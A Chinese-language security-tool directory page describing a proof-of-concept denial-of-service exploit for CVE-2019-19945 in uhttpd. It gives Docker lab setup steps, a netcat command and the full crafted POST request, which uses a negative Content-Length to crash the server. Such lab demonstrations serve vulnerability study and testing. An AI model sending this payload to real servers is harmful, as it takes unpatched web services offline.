Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2019-19945_Test — CVE-2019-19945 的概念验证漏洞利用程序,演示了通过带有负值 Content-Length 头的特制 POST 请求对 uhttpd 发起的拒绝服务攻击。 | Kitploit
工具/GitHubGitHub/delicatebyte/cve-2019-19945_test
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHubdelicatebyte/cve-2019-19945_test

CVE-2019-19945_Test

CVE-2019-19945 的概念验证漏洞利用程序,演示了通过带有负值 Content-Length 头的特制 POST 请求对 uhttpd 发起的拒绝服务攻击。

查看仓库
14年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2019-19945_Test

这是第一个提议的 CVE 的代码。

  1. 安装 Docker

  2. 构建并运行服务器 cd Server docker build -t server/cve . docker run -d --name server -p 80:80 server/cve

  3. 获取服务器容器的 IP Linux sudo docker container inspect server | grep -i IPAddress Windows Powershell docker container inspect server | Select-String "IPAddress" 提取 IP 并将其添加到构建客户端的命令中 您可以通过在浏览器中访问 localhost:80 来检查服务器

  4. 构建并运行客户端 通过取消注释 Client/Dockerfile 中的 CMD,攻击将在容器启动时自动开始 cd ../Client/ docker build --build-arg server_ip=<SERVER_IP> -t client/cve . docker run -d -p 8080:8080 client/cve

  5. 附加到客户端 Docker docker container ls find client/cve container && attach docker exec -it /bin/sh

  6. 准备好后发起攻击 ./crash.sh

  7. 服务器将无法响应

带注释的源代码

实际上没有必要提供带注释的源代码,因为这个漏洞利用代码非常短。

该漏洞利用包括使用 Netcat 向服务器发送一个带有较大的负 Content-Length 的 POST 请求,涉及 cgi-bin/ 目录中文件的处理。

执行过程使用一个简单的 netcat 脚本。这里引用了服务器 CGI-bin 文件夹中一个名为 Crash 的文件。 nc <SERVER_IP> < crash.poc

crash.poc

POST /cgi-bin/crash HTTP/1.0 Transfer-Encoding: chunked Content-Length: -100000

下载工具